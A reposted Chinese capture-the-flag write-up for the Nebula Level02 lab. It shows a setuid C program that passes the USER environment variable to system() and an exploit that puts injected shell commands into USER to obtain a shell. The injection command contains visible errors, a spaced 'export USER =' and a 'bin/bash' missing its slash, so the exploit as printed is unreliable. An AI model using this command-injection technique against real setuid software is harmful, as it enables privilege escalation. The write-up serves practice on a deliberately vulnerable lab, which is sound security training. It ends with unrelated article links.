ExploitExercises_Nebula_Level02
来源:互联网 发布:素材软件 编辑:程序博客网 时间:2024/04/19 08:17
题目源代码:
#include <stdlib.h>#include <unistd.h>#include <string.h>#include <sys/types.h>#include <stdio.h>int main(int argc, char **argv, char **envp){ char *buffer; gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid); setresuid(uid, uid, uid); buffer = NULL; asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); printf("about to call system(\"%s\")\n", buffer); system(buffer);}
运行/home/flag02/flag02,输出:
about to call system("/bin/echo level02 is cool")level02 is cool
为了让system执行shell,需要对环境变量USER做手脚:
export USER = '-e "bin/bash" > /tmp/abc; chmod +x /tmp/abc; /tmp/abc is cool'
此时,buffer为:
/bin/echo -e "bin/bash" > /tmp/abc; chmod +x /tmp/abc; /tmp/abc is cool
然后运行程序,shell执行。
0 0
- ExploitExercises_Nebula_Level02
- 网站安全,SQL注入
- JS使用正则表达式实现ReplaceAll方法
- 面向对象设计的过程就是抽象的过程,分以下三步来完成
- okhttp的异步请求
- 记录工作中遇到的一些常用方法
- ExploitExercises_Nebula_Level02
- iOS PhotoKit
- Linux driver model ----- platform
- C语言中,getchar()函数的使用事项
- oracl 函数示例 FUNCTION 必须有返回值
- 百度地图 获取Android签名证书的sha1值 (百度地图SDK 230错误)
- 判断一棵二叉树是不是另一棵的子结构问题
- LeetCode394 Decode String java solution
- App测试中ios和Android的区别2